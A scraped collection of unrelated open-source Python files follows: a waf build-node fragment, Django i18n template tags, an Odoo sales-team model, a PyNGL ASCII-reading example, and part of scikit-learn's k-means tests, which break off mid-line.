self.path_from(self.ctx.bldnode) def srcpath(self): return self.path_from(self.ctx.srcnode) def relpath(self): cur=self x=id(self.ctx.bldnode) while cur.parent: if id(cur)==x: return self.bldpath() cur=cur.parent return self.srcpath() def bld_dir(self): return self.parent.bldpath() def get_bld_sig(self): try: return self.cache_sig except AttributeError: pass if not self.is_bld()or self.ctx.bldnode is self.ctx.srcnode: self.sig=Utils.h_file(self.abspath()) self.cache_sig=ret=self.sig return ret pickle_lock=Utils.threading.Lock() class Nod3(Node): pass
iguzu/gae-django
refs/heads/master
django/templatetags/i18n.py
9
import re from django.template import Node, Variable, VariableNode, _render_value_in_context from django.template import TemplateSyntaxError, TokenParser, Library from django.template import TOKEN_TEXT, TOKEN_VAR from django.utils import translation from django.utils.encoding import force_unicode register = Library() class GetAvailableLanguagesNode(Node): def __init__(self, variable): self.variable = variable def render(self, context): from django.conf import settings context[self.variable] = [(k, translation.ugettext(v)) for k, v in settings.LANGUAGES] return '' class GetCurrentLanguageNode(Node): def __init__(self, variable): self.variable = variable def render(self, context): context[self.variable] = translation.get_language() return '' class GetCurrentLanguageBidiNode(Node): def __init__(self, variable): self.variable = variable def render(self, context): context[self.variable] = translation.get_language_bidi() return '' class TranslateNode(Node): def __init__(self, value, noop): self.value = Variable(value) self.noop = noop def render(self, context): value = self.value.resolve(context) if self.noop: return value else: return _render_value_in_context(translation.ugettext(value), context) class BlockTranslateNode(Node): def __init__(self, extra_context, singular, plural=None, countervar=None, counter=None): self.extra_context = extra_context self.singular = singular self.plural = plural self.countervar = countervar self.counter = counter def render_token_list(self, tokens): result = [] vars = [] for token in tokens: if token.token_type == TOKEN_TEXT: result.append(token.contents) elif token.token_type == TOKEN_VAR: result.append(u'%%(%s)s' % token.contents) vars.append(token.contents) return ''.join(result), vars def render(self, context): tmp_context = {} for var, val in self.extra_context.items(): tmp_context[var] = val.render(context) # Update() works like a push(), so corresponding context.pop() is at # the end of function context.update(tmp_context) singular, vars = self.render_token_list(self.singular) if self.plural and self.countervar and self.counter: count = self.counter.resolve(context) context[self.countervar] = count plural, vars = self.render_token_list(self.plural) result = translation.ungettext(singular, plural, count) else: result = translation.ugettext(singular) # Escape all isolated '%' before substituting in the context. result = re.sub(u'%(?!\()', u'%%', result) data = dict([(v, _render_value_in_context(context[v], context)) for v in vars]) context.pop() return result % data def do_get_available_languages(parser, token): """ This will store a list of available languages in the context. Usage:: {% get_available_languages as languages %} {% for language in languages %} ... {% endfor %} This will just pull the LANGUAGES setting from your setting file (or the default settings) and put it into the named variable. """ args = token.contents.split() if len(args) != 3 or args[1] != 'as': raise TemplateSyntaxError, "'get_available_languages' requires 'as variable' (got %r)" % args return GetAvailableLanguagesNode(args[2]) def do_get_current_language(parser, token): """ This will store the current language in the context. Usage:: {% get_current_language as language %} This will fetch the currently active language and put it's value into the ``language`` context variable. """ args = token.contents.split() if len(args) != 3 or args[1] != 'as': raise TemplateSyntaxError, "'get_current_language' requires 'as variable' (got %r)" % args return GetCurrentLanguageNode(args[2]) def do_get_current_language_bidi(parser, token): """ This will store the current language layout in the context. Usage:: {% get_current_language_bidi as bidi %} This will fetch the currently active language's layout and put it's value into the ``bidi`` context variable. True indicates right-to-left layout, otherwise left-to-right """ args = token.contents.split() if len(args) != 3 or args[1] != 'as': raise TemplateSyntaxError, "'get_current_language_bidi' requires 'as variable' (got %r)" % args return GetCurrentLanguageBidiNode(args[2]) def do_translate(parser, token): """ This will mark a string for translation and will translate the string for the current language. Usage:: {% trans "this is a test" %} This will mark the string for translation so it will be pulled out by mark-messages.py into the .po files and will run the string through the translation engine. There is a second form:: {% trans "this is a test" noop %} This will only mark for translation, but will return the string unchanged. Use it when you need to store values into forms that should be translated later on. You can use variables instead of constant strings to translate stuff you marked somewhere else:: {% trans variable %} This will just try to translate the contents of the variable ``variable``. Make sure that the string in there is something that is in the .po file. """ class TranslateParser(TokenParser): def top(self): value = self.value() if self.more(): if self.tag() == 'noop': noop = True else: raise TemplateSyntaxError, "only option for 'trans' is 'noop'" else: noop = False return (value, noop) value, noop = TranslateParser(token.contents).top() return TranslateNode(value, noop) def do_block_translate(parser, token): """ This will translate a block of text with parameters. Usage:: {% blocktrans with foo|filter as bar and baz|filter as boo %} This is {{ bar }} and {{ boo }}. {% endblocktrans %} Additionally, this supports pluralization:: {% blocktrans count var|length as count %} There is {{ count }} object. {% plural %} There are {{ count }} objects. {% endblocktrans %} This is much like ngettext, only in template syntax. """ class BlockTranslateParser(TokenParser): def top(self): countervar = None counter = None extra_context = {} while self.more(): tag = self.tag() if tag == 'with' or tag == 'and': value = self.value() if self.tag() != 'as': raise TemplateSyntaxError, "variable bindings in 'blocktrans' must be 'with value as variable'" extra_context[self.tag()] = VariableNode( parser.compile_filter(value)) elif tag == 'count': counter = parser.compile_filter(self.value()) if self.tag() != 'as': raise TemplateSyntaxError, "counter specification in 'blocktrans' must be 'count value as variable'" countervar = self.tag() else: raise TemplateSyntaxError, "unknown subtag %s for 'blocktrans' found" % tag return (countervar, counter, extra_context) countervar, counter, extra_context = BlockTranslateParser(token.contents).top() singular = [] plural = [] while parser.tokens: token = parser.next_token() if token.token_type in (TOKEN_VAR, TOKEN_TEXT): singular.append(token) else: break if countervar and counter: if token.contents.strip() != 'plural': raise TemplateSyntaxError, "'blocktrans' doesn't allow other block tags inside it" while parser.tokens: token = parser.next_token() if token.token_type in (TOKEN_VAR, TOKEN_TEXT): plural.append(token) else: break if token.contents.strip() != 'endblocktrans': raise TemplateSyntaxError, "'blocktrans' doesn't allow other block tags (seen %r) inside it" % token.contents return BlockTranslateNode(extra_context, singular, plural, countervar, counter) register.tag('get_available_languages', do_get_available_languages) register.tag('get_current_language', do_get_current_language) register.tag('get_current_language_bidi', do_get_current_language_bidi) register.tag('trans', do_translate) register.tag('blocktrans', do_block_translate)
blaggacao/OpenUpgrade
refs/heads/8.0
addons/sales_team/sales_team.py
75
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-today OpenERP SA (<http://www.openerp.com>) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from datetime import date, datetime from dateutil import relativedelta from openerp import tools from openerp.osv import fields, osv class crm_case_section(osv.osv): _name = "crm.case.section" _inherit = ['mail.thread', 'ir.needaction_mixin'] _description = "Sales Teams" _order = "complete_name" _period_number = 5 def get_full_name(self, cr, uid, ids, field_name, arg, context=None): return dict(self.name_get(cr, uid, ids, context=context)) def __get_bar_values(self, cr, uid, obj, domain, read_fields, value_field, groupby_field, context=None): """ Generic method to generate data for bar chart values using SparklineBarWidget. This method performs obj.read_group(cr, uid, domain, read_fields, groupby_field). :param obj: the target model (i.e. crm_lead) :param domain: the domain applied to the read_group :param list read_fields: the list of fields to read in the read_group :param str value_field: the field used to compute the value of the bar slice :param str groupby_field: the fields used to group :return list section_result: a list of dicts: [ { 'value': (int) bar_column_value, 'tootip': (str) bar_column_tooltip, } ] """ month_begin = date.today().replace(day=1) section_result = [{ 'value': 0, 'tooltip': tools.ustr((month_begin + relativedelta.relativedelta(months=-i)).strftime('%B %Y')), } for i in range(self._period_number - 1, -1, -1)] group_obj = obj.read_group(cr, uid, domain, read_fields, groupby_field, context=context) pattern = tools.DEFAULT_SERVER_DATE_FORMAT if obj.fields_get(cr, uid, groupby_field)[groupby_field]['type'] == 'date' else tools.DEFAULT_SERVER_DATETIME_FORMAT for group in group_obj: group_begin_date = datetime.strptime(group['__domain'][0][2], pattern) month_delta = relativedelta.relativedelta(month_begin, group_begin_date) section_result[self._period_number - (month_delta.months + 1)] = {'value': group.get(value_field, 0), 'tooltip': group.get(groupby_field, 0)} return section_result _columns = { 'name': fields.char('Sales Team', size=64, required=True, translate=True), 'complete_name': fields.function(get_full_name, type='char', size=256, readonly=True, store=True), 'code': fields.char('Code', size=8), 'active': fields.boolean('Active', help="If the active field is set to "\ "true, it will allow you to hide the sales team without removing it."), 'change_responsible': fields.boolean('Reassign Escalated', help="When escalating to this team override the salesman with the team leader."), 'user_id': fields.many2one('res.users', 'Team Leader'), 'member_ids': fields.many2many('res.users', 'sale_member_rel', 'section_id', 'member_id', 'Team Members'), 'reply_to': fields.char('Reply-To', size=64, help="The email address put in the 'Reply-To' of all emails sent by Odoo about cases in this sales team"), 'parent_id': fields.many2one('crm.case.section', 'Parent Team'), 'child_ids': fields.one2many('crm.case.section', 'parent_id', 'Child Teams'), 'note': fields.text('Description'), 'working_hours': fields.float('Working Hours', digits=(16, 2)), 'color': fields.integer('Color Index'), } _defaults = { 'active': 1, } _sql_constraints = [ ('code_uniq', 'unique (code)', 'The code of the sales team must be unique !') ] _constraints = [ (osv.osv._check_recursion, 'Error ! You cannot create recursive Sales team.', ['parent_id']) ] def name_get(self, cr, uid, ids, context=None): """Overrides orm name_get method""" if not isinstance(ids, list): ids = [ids] res = [] if not ids: return res reads = self.read(cr, uid, ids, ['name', 'parent_id'], context) for record in reads: name = record['name'] if record['parent_id']: name = record['parent_id'][1] + ' / ' + name res.append((record['id'], name)) return res class res_partner(osv.Model): _inherit = 'res.partner' _columns = { 'section_id': fields.many2one('crm.case.section', 'Sales Team'), } class res_users(osv.Model): _inherit = 'res.users' _columns = { 'default_section_id': fields.many2one('crm.case.section', 'Default Sales Team'), } def __init__(self, pool, cr): init_res = super(res_users, self).__init__(pool, cr) # duplicate list to avoid modifying the original reference self.SELF_WRITEABLE_FIELDS = list(self.SELF_WRITEABLE_FIELDS) self.SELF_WRITEABLE_FIELDS.extend(['default_section_id']) return init_res
KMFleischer/PyEarthScience
refs/heads/master
Transition_examples_NCL_to_PyNGL/read_data/TRANS_read_ASCII_lat_lon_value_way2.py
1
# # File: # TRANS_read_ASCII_lat_lon_value_way2.py # # Synopsis: # Illustrates how to read an ASCII file and create a # contour fill plot on a map # # Categories: # I/O # contour plot # map plot # # Author: # Karin Meier-Fleischer, based on NCL example # # Date of initial publication: # September 2018 # # Description: # This example shows how to read an ASCII file and # create a contour fill plot on a map. # # Effects illustrated: # o Read ASCII data # o Drawing contours # o Drawing a map # # Output: # - # # Notes: The data for this example can be downloaded from # http://www.ncl.ucar.edu/Document/Manuals/NCL_User_Guide/Data/ # """ Transition Guide Python Example: TRANS_read_ASCII_lat_lon_value_way2.py based on read_asc6.ncl: http://ncl.ucar.edu/Applications/Scripts/read_asc6.ncl - read ASCII file asc6.txt - retrieve variable informations - draw contours on a map asc6.txt Lat Lon Temp (C) 33.3 76.5 20.3 33.3 76.6 20.3 33.3 76.7 21.5 33.3 76.8 20.0 ..... 2018-08-27 kmf """ from __future__ import print_function import numpy as np print("") #-- read the data f = open("asc6.txt",'r') data = f.readlines() #-- data: type list nrows = len(data) #-- assign lists to append elements lat0 = [] lon0 = [] vals = [] for i in data[1::]: line = i.strip() print(line) cols = line.split() lat0.append(cols[0]) lon0.append(cols[1]) vals.append(cols[2]) #-- convert string to float print(len(lat0)) print(len(lon0)) print(len(vals)) lat0 = np.array(lat0).astype(float) lon0 = np.array(lon0).astype(float) temp1d = np.array(vals).astype(float) indeqlat = np.array(np.where(lat0 == lat0[0])) print(type(indeqlat)) nlons = indeqlat.shape #-- number of longitudes nlons = nlons[1] #-- number of longitudes nlats = nrows / nlons #-- number of latitude lat = lat0[::nlons] lon = lon0[0:nlons] #setattr(lat, 'units', 'degrees_north') #setattr(lon, 'units', 'degrees_east') #-- rows by column print("--> nlats: " + str(len(lat))) print("--> nlons: " + str(len(lon))) print("--> rank of vals: " + str(len(temp1d.shape))) print("--> shape temp1d: " + str(temp1d.shape)) temp2d = np.reshape(temp1d,(nlats,nlons)) #setattr(temp2d, 'units', 'degC') #setattr(telp2d, 'long_name', 'temperature') print("--> shape temp2d: " + str(temp2d)) print("--> shape temp2d: " + str(temp2d.shape)) exit()
ChanderG/scikit-learn
refs/heads/master
sklearn/cluster/tests/test_k_means.py
132
"""Testing for K-means""" import sys import numpy as np from scipy import sparse as sp from sklearn.utils.testing import assert_equal from sklearn.utils.testing import assert_array_equal from sklearn.utils.testing import assert_array_almost_equal from sklearn.utils.testing import SkipTest from sklearn.utils.testing import assert_almost_equal from sklearn.utils.testing import assert_raises from sklearn.utils.testing import assert_raises_regexp from sklearn.utils.testing import assert_true from sklearn.utils.testing import assert_greater from sklearn.utils.testing import assert_less from sklearn.utils.testing import assert_warns from sklearn.utils.testing import if_not_mac_os from sklearn.utils.validation import DataConversionWarning from sklearn.utils.extmath import row_norms from sklearn.metrics.cluster import v_measure_score from sklearn.cluster import KMeans, k_means from sklearn.cluster import MiniBatchKMeans from sklearn.cluster.k_means_ import _labels_inertia from sklearn.cluster.k_means_ import _mini_batch_step from sklearn.datasets.samples_generator import make_blobs from sklearn.externals.six.moves import cStringIO as StringIO # non centered, sparse centers to check the centers = np.array([ [0.0, 5.0, 0.0, 0.0, 0.0], [1.0, 1.0, 4.0, 0.0, 0.0], [1.0, 0.0, 0.0, 5.0, 1.0], ]) n_samples = 100 n_clusters, n_features = centers.shape X, true_labels = make_blobs(n_samples=n_samples, centers=centers, cluster_std=1., random_state=42) X_csr = sp.csr_matrix(X) def test_kmeans_dtype(): rnd = np.random.RandomState(0) X = rnd.normal(size=(40, 2)) X = (X * 10).astype(np.uint8) km = KMeans(n_init=1).fit(X) pred_x = assert_warns(DataConversionWarning, km.predict, X) assert_array_equal(km.labels_, pred_x) def test_labels_assignment_and_inertia(): # pure numpy implementation as easily auditable reference gold # implementation rng = np.random.RandomState(42) noisy_centers = centers + rng.normal(size=centers.shape) labels_gold = - np.ones(n_samples, dtype=np.int) mindist = np.empty(n_samples) mindist.fill(np.infty) for center_id in range(n_clusters): dist = np.sum((X - noisy_centers[center_id]) ** 2, axis=1) labels_gold[dist < mindist] = center_id mindist = np.minimum(dist, mindist) inertia_gold = mindist.sum() assert_true((mindist >= 0.0).all()) assert_true((labels_gold != -1).all()) # perform label assignment using the dense array input x_squared_norms = (X ** 2).sum(axis=1) labels_array, inertia_array = _labels_inertia( X, x_squared_norms, noisy_centers) assert_array_almost_equal(inertia_array, inertia_gold) assert_array_equal(labels_array, labels_gold) # perform label assignment using the sparse CSR input x_squared_norms_from_csr = row_norms(X_csr, squared=True) labels_csr, inertia_csr = _labels_inertia( X_csr, x_squared_norms_from_csr, noisy_centers) assert_array_almost_equal(inertia_csr, inertia_gold) assert_array_equal(labels_csr, labels_gold) def test_minibatch_update_consistency(): # Check that dense and sparse minibatch update give the same results rng = np.random.RandomState(42) old_centers = centers + rng.normal(size=centers.shape) new_centers = old_centers.copy() new_centers_csr = old_centers.copy() counts = np.zeros(new_centers.shape[0], dtype=np.int32) counts_csr = np.zeros(new_centers.shape[0], dtype=np.int32) x_squared_norms = (X ** 2).sum(axis=1) x_squared_norms_csr = row_norms(X_csr, squared=True) buffer = np.zeros(centers.shape[1], dtype=np.double) buffer_csr = np.zeros(centers.shape[1], dtype=np.double) # extract a small minibatch X_mb = X[:10] X_mb_csr = X_csr[:10] x_mb_squared_norms = x_squared_norms[:10] x_mb_squared_norms_csr = x_squared_norms_csr[:10] # step 1: compute the dense minibatch update old_inertia, incremental_diff = _mini_batch_step( X_mb, x_mb_squared_norms, new_centers, counts, buffer, 1, None, random_reassign=False) assert_greater(old_inertia, 0.0) # compute the new inertia on the same batch to check that it decreased labels, new_inertia = _labels_inertia( X_mb, x_mb_squared_norms, new_centers) assert_greater(new_inertia, 0.0) assert_less(new_inertia, old_inertia) # check that the incremental difference computation is matching the # final observed value effective_diff = np.sum((new_centers - old_centers) ** 2) assert_almost_equal(incremental_diff, effective_diff) # step 2: compute the sparse minibatch update old_inertia_csr, incremental_diff_csr = _mini_batch_step( X_mb_csr, x_mb_squared_norms_csr, new_centers_csr, counts_csr, buffer_csr, 1, None, random_reassign=False) assert_greater(old_inertia_csr, 0.0) # compute the new inertia on the same batch to check that it decreased labels_csr, new_inertia_csr = _labels_inertia( X_mb_csr, x_mb_squared_norms_csr, new_centers_csr) assert_greater(new_inertia_csr, 0.0) assert_less(new_inertia_csr, old_inertia_csr) # check that the incremental difference computation is matching the # final observed value effective_diff = np.sum((new_centers_csr - old_centers) ** 2) assert_almost_equal(incremental_diff_csr, effective_diff) # step 3: check that sparse and dense updates lead to the same results assert_array_equal(labels, labels_csr) assert_array_almost_equal(new_centers, new_centers_csr) assert_almost_equal(incremental_diff, incremental_diff_csr) assert_almost_equal(old_inertia, old_inertia_csr) assert_almost_equal(new_inertia, new_inertia_csr) def _check_fitted_model(km): # check that the number of clusters centers and distinct labels match # the expectation centers = km.cluster_centers_ assert_equal(centers.shape, (n_clusters, n_features)) labels = km.labels_ assert_equal(np.unique(labels).shape[0], n_clusters) # check that the labels assignment are perfect (up to a permutation) assert_equal(v_measure_score(true_labels, labels), 1.0) assert_greater(km.inertia_, 0.0) # check error on dataset being too small assert_raises(ValueError, km.fit, [[0., 1.]]) def test_k_means_plus_plus_init(): km = KMeans(init="k-means++", n_clusters=n_clusters, random_state=42).fit(X) _check_fitted_model(km) def test_k_means_new_centers(): # Explore the part of the code where a new center is reassigned X = np.array([[0, 0, 1, 1], [0, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 1, 0, 0]]) labels = [0, 1, 2, 1, 1, 2] bad_centers = np.array([[+0, 1, 0, 0], [.2, 0, .2, .2], [+0, 0, 0, 0]]) km = KMeans(n_clusters=3, init=bad_centers, n_init=1, max_iter=10, random_state=1) for this_X in (X, sp.coo_matrix(X)): km.fit(this_X) this_labels = km.labels_ # Reorder the labels so that the first instance is in cluster 0, # the second in cluster 1, ... this_labels = np.unique(this_labels, return_index=True)[1][this_labels] np.testing.assert_array_equal(this_labels, labels) def _has_blas_lib(libname): from numpy.distutils.system_info import get_info return libname in get_info('blas_opt').get('libraries', []) @if_not_mac_os() def test_k_means_plus_plus_init_2_jobs(): if _has_blas_lib('openblas'): raise SkipTest('Multi-process bug with OpenBLAS (see issue #636)') km = KMeans(init="k-means++", n_clusters=n_clusters, n_jobs=2, random_state=42).fit(X) _check_fitted_model(km) def test_k_means_precompute_distances_flag(): # check that a warning is raised if the precompute_distances flag is not # supported km = KMeans(precompute_distances="wrong") assert_raises(ValueError, km.fit, X) def test_k_means_plus_plus_init_sparse(): km = KMeans(init="k-means++", n_clusters=n_clusters, random_state=42) km.fit(X_csr) _check_fitted_model(km) def test_k_means_random_init(): km = KMeans(init="random", n_clusters=n_clusters, random_state=42) km.fit(X) _check_fitted_model(km) def test_k_means_random_init_sparse(): km = KMeans(init="random", n_clusters=n_clusters, random_state=42) km.fit(X_csr) _check_fitted_model(km) def test_k_means_plus_plus_init_not_precomputed(): km = KMeans(init="k-means++", n_clusters=n_clusters, random_state=42, precompute_distances=False).fit(X) _check_fitted_model(km) def test_k_means_random_init_not_precomputed(): km = KMeans(init="random", n_clusters=n_clusters, random_state=42, precompute_distances=False).fit(X) _check_fitted_model(km) def test_k_means_perfect_init(): km = KMeans(init=centers.copy(), n_clusters=n_clusters, random_state=42, n_init=1) km.fit(X) _check_fitted_model(km) def test_k_means_n_init(): rnd = np.random.RandomState(0) X = rnd.normal(size=(40, 2)) # two regression tests on bad n_init argument # previous bug: n_init <= 0 threw non-informative TypeError (#3858) assert_raises_regexp(ValueError, "n_init", KMeans(n_init=0).fit, X) assert_raises_regexp(ValueError, "n_init", KMeans(n_init=-1).fit, X) def test_k_means_fortran_aligned_data(): # Check the KMeans will work well, even if X is a fortran-aligned data. X = np.asfortranarray([[0, 0], [0, 1], [0, 1]]) centers = np.array([[0, 0], [0, 1]]) labels = np.array([0, 1, 1]) km = KMeans(n_init=1, init=centers, precompute_distances=False, random_state=42) km.fit(X) assert_array_equal(km.cluster_centers_, centers) assert_array_equal(km.labels_, labels) def test_mb_k_means_plus_plus_init_dense_array(): mb_k_means = MiniBatchKMeans(init="k-means++", n_clusters=n_clusters, random_state=42) mb_k_means.fit(X) _check_fitted_model(mb_k_means) def test_mb_kmeans_verbose(): mb_k_means = MiniBatchKMeans(init="k-means++", n_clusters=n_clusters, random_state=42, verbose=1) old_stdout = sys.stdout sys.stdout = StringIO() try: mb_k_means.fit(X) finally: sys.stdout = old_stdout def test_mb_k_means_plus_plus_init_sparse_matrix(): mb_k_means = MiniBatchKMeans(init="k-means++", n_clusters=n_clusters, random_state=42) mb_k_means.fit(X_csr) _check_fitted_model(mb_k_means) def test_minibatch_init_with_large_k(): mb_k_means = MiniBatchKMeans(init='k-means++', init_size=10, n_clusters=20) # Check that a warning is raised, as the number clusters is larger # than the init_size assert_warns(RuntimeWarning, mb_k_means.fit, X) def test_minibatch_k_means_random_init_dense_array(): # increase n_init to make random init stable enough mb_k_means = MiniBatchKMeans(init="random", n_clusters=n_clusters, random_state=42, n_init=10).fit(X) _check_fitted_model(mb_k_means) def test_minibatch_k_means_random_init_sparse_csr(): # increase n_init to make random init stable enough mb_k_means = MiniBatchKMeans(init="random", n_clusters=n_clusters, random_state=42, n_init=10).fit(X_csr) _check_fitted_model(mb_k_means) def test_minibatch_k_means_perfect_init_dense_array(): mb_k_means = MiniBatchKMeans(init=centers.copy(), n_clusters=n_clusters, random_state=42, n_init=1).fit(X) _check_fitted_model(mb_k_means) def test_minibatch_k_means_init_multiple_runs_with_explicit_centers(): mb_k_means = MiniBatchKMeans(init=centers.copy(), n_clusters=n_clusters, random_state=42, n_init=10) assert_warns(RuntimeWarning, mb_k_means.fit, X) def test_minibatch_k_means_perfect_init_sparse_csr(): mb_k_means = MiniBatchKMeans(init=centers.copy(), n_clusters=n_clusters, random_state=42, n_init=1).fit(X_csr) _check_fitted_model(mb_k_means) def test_minibatch_sensible_reassign_fit(): # check if identical initial clusters are reassigned # also a regression test for when there are more desired reassignments than # samples. zeroed_X, true_labels = make_blobs(n_samples=100, centers=5, cluster_std=1., random_state=42) zeroed_X[::2, :] = 0 mb_k_means = MiniBatchKMeans(n_clusters=20, batch_size=10, random_state=42, init="random") mb_k_means.fit(zeroed_X) # there should not be too many exact zero cluster centers assert_greater(mb_k_means.cluster_centers_.any(axis=1).sum(), 10) # do the same with batch-size > X.shape[0] (regression test) mb_k_means = MiniBatchKMeans(n_clusters=20, batch_size=201, random_state=42, init="random") mb_k_means.fit(zeroed_X) # there should not be too many exact zero cluster centers assert_greater(mb_k_means.cluster_centers_.any(axis=1).sum(), 10) def test_minibatch_sensible_reassign_partial_fit(): zeroed_X, true_labels = make_blobs(n_samples=n_samples, centers=5, cluster_std=1., random_state=42) zeroed_X[::2, :] = 0 mb_k_means = MiniBatchKMeans(n_clusters=20, random_state=42, init="random") for i in range(100): mb_k_means.partial_fit(zeroed_X) # there should not be too many exact zero cluster centers assert_greater(mb_k_means.cluster_centers_.any(axis=1).sum(), 10) def test_minibatch_reassign(): # Give a perfect initialization, but a large reassignment_ratio, # as a result all the centers should be reassigned and the model # should not longer be good for this_X in (X, X_csr): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, batch_size=100, random_state=42) mb_k_means.fit(this_X) score_before = mb_k_means.score(this_X) try: old_stdout = sys.stdout sys.stdout = StringIO() # Turn on verbosity to smoke test the display code _mini_batch_step(this_X, (X ** 2).sum(axis=1), mb_k_means.cluster_centers_, mb_k_means.counts_, np.zeros(X.shape[1], np.double), False, distances=np.zeros(X.shape[0]), random_reassign=True, random_state=42, reassignment_ratio=1, verbose=True) finally: sys.stdout = old_stdout assert_greater(score_before, mb_k_means.score(this_X)) # Give a perfect initialization, with a small reassignment_ratio, # no center should be reassigned for this_X in (X, X_csr): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, batch_size=100, init=centers.copy(), random_state=42, n_init=1) mb_k_means.fit(this_X) clusters_before = mb_k_means.cluster_centers_ # Turn on verbosity to smoke test the display code _mini_batch_step(this_X, (X ** 2).sum(axis=1), mb_k_means.cluster_centers_, mb_k_means.counts_, np.zeros(X.shape[1], np.double), False, distances=np.zeros(X.shape[0]), random_reassign=True, random_state=42, reassignment_ratio=1e-15) assert_array_almost_equal(clusters_before, mb_k_means.cluster_centers_) def test_minibatch_with_many_reassignments(): # Test for the case that the number of clusters to reassign is bigger # than the batch_size n_samples = 550 rnd = np.random.RandomState(42) X = rnd.uniform(size=(n_samples, 10)) # Check that the fit works if n_clusters is bigger than the batch_size. # Run the test with 550 clusters and 550 samples, because it turned out # that this values ensure that the number of clusters to reassign # is always bigger than the batch_size n_clusters = 550 MiniBatchKMeans(n_clusters=n_clusters, batch_size=100, init_size=n_samples, random_state=42).fit(X) def test_sparse_mb_k_means_callable_init(): def test_init(X, k, random_state): return centers # Small test to check that giving the wrong number of centers # raises a meaningful error assert_raises(ValueError, MiniBatchKMeans(init=test_init, random_state=42).fit, X_csr) # Now check that the fit actually works mb_k_means = MiniBatchKMeans(n_clusters=3, init=test_init, random_state=42).fit(X_csr) _check_fitted_model(mb_k_means) def test_mini_batch_k_means_random_init_partial_fit(): km = MiniBatchKMeans(n_clusters=n_clusters, init="random", random_state=42) # use the partial_fit API for online learning for X_minibatch in np.array_split(X, 10): km.partial_fit(X_minibatch) # compute the labeling on the complete dataset labels = km.predict(X) assert_equal(v_measure_score(true_labels, labels), 1.0) def test_minibatch_default_init_size(): mb_k_means = MiniBatchKMeans(init=centers.copy(), n_clusters=n_clusters, batch_size=10, random_state=42, n_init=1).fit(X) assert_equal(mb_k_means.init_size_, 3 * mb_k_means.batch_size) _check_fitted_model(mb_k_means) def test_minibatch_tol(): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, batch_size=10, random_state=42, tol=.01).fit(X) _check_fitted_model(mb_k_means) def test_minibatch_set_init_size(): mb_k_means = MiniBatchKMeans(init=centers.copy(), n_clusters=n_clusters, init_size=666, random_state=42, n_init=1).fit(X) assert_equal(mb_k_means.init_size, 666) assert_equal(mb_k_means.init_size_, n_samples) _check_fitted_model(mb_k_means) def test_k_means_invalid_init(): km = KMeans(init="invalid", n_init=1, n_clusters=n_clusters) assert_raises(ValueError, km.fit, X) def test_mini_match_k_means_invalid_init(): km = MiniBatchKMeans(init="invalid", n_init=1, n_clusters=n_clusters) assert_raises(ValueError, km.fit, X) def test_k_means_copyx(): # Check if copy_x=False returns nearly equal X after de-centering. my_X = X.copy() km = KMeans(copy_x=False, n_clusters=n_clusters, random_state=42) km.fit(my_X) _check_fitted_model(km) # check if my_X is centered assert_array_almost_equal(my_X, X) def test_k_means_non_collapsed(): # Check k_means with a bad initialization does not yield a singleton # Starting with bad centers that are quickly ignored should not # result in a repositioning of the centers to the center of mass that # would lead to collapsed centers which in turns make the clustering # dependent of the numerical unstabilities. my_X = np.array([[1.1, 1.1], [0.9, 1.1], [1.1, 0.9], [0.9, 1.1]]) array_init = np.array([[1.0, 1.0], [5.0, 5.0], [-5.0, -5.0]]) km = KMeans(init=array_init, n_clusters=3, random_state=42, n_init=1) km.fit(my_X) # centers must not been collapsed assert_equal(len(np.unique(km.labels_)), 3) centers = km.cluster_centers_ assert_true(np.linalg.norm(centers[0] - centers[1]) >= 0.1) assert_true(np.linalg.norm(centers[0] - centers[2]) >= 0.1) assert_true(np.linalg.norm(centers[1] - centers[2]) >= 0.1) def test_predict(): km = KMeans(n_clusters=n_clusters, random_state=42) km.fit(X) # sanity check: predict centroid labels pred = km.predict(km.cluster_centers_) assert_array_equal(pred, np.arange(n_clusters)) # sanity check: re-predict labeling for training set samples pred = km.predict(X) assert_array_equal(pred, km.labels_) # re-predict labels for training set using fit_predict pred = km.fit_predict(X) assert_array_equal(pred, km.labels_) def test_score(): km1 = KMeans(n_clusters=n_clusters, max_iter=1, random_state=42) s1 = km1.fit(X).score(X) km2 = KMeans(n_clusters=n_clusters, max_iter=10, random_state=42) s2 = km2.fit(X).score(X) assert_greater(s2, s1) def test_predict_minibatch_dense_input(): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, random_state=40).fit(X) # sanity check: predict centroid labels pred = mb_k_means.predict(mb_k_means.cluster_centers_) assert_array_equal(pred, np.arange(n_clusters)) # sanity check: re-predict labeling for training set samples pred = mb_k_means.predict(X) assert_array_equal(mb_k_means.predict(X), mb_k_means.labels_) def test_predict_minibatch_kmeanspp_init_sparse_input(): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, init='k-means++', n_init=10).fit(X_csr) # sanity check: re-predict labeling for training set samples assert_array_equal(mb_k_means.predict(X_csr), mb_k_means.labels_) # sanity check: predict centroid labels pred = mb_k_means.predict(mb_k_means.cluster_centers_) assert_array_equal(pred, np.arange(n_clusters)) # check that models trained on sparse input also works for dense input at # predict time assert_array_equal(mb_k_means.predict(X), mb_k_means.labels_) def test_predict_minibatch_random_init_sparse_input(): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, init='random', n_init=10).fit(X_csr) # sanity check: re-predict labeling for training set samples assert_array_equal(mb_k_means.predict(X_csr), mb_k_means.labels_) # sanity check: predict centroid labels pred = mb_k_means.predict(mb_k_means.cluster_centers_) assert_array_equal(pred, np.arange(n_clusters)) # check that models trained on sparse input also works for dense input at # predict time assert_array_equal(mb_k_means.predict(X), mb_k_means.labels_) def test_input_dtypes(): X_list = [[0, 0], [10, 10], [12, 9], [-1, 1], [2, 0], [8, 10]] X_int = np.array(X_list, dtype=np.int32) X_int_csr = sp.csr_matrix(X_int) init_int = X_int[:2] fitted_models = [ KMeans(n_clusters=2).fit(X_list), KMeans(n_clusters=2).fit(X_int), KMeans(n_clusters=2, init=init_int, 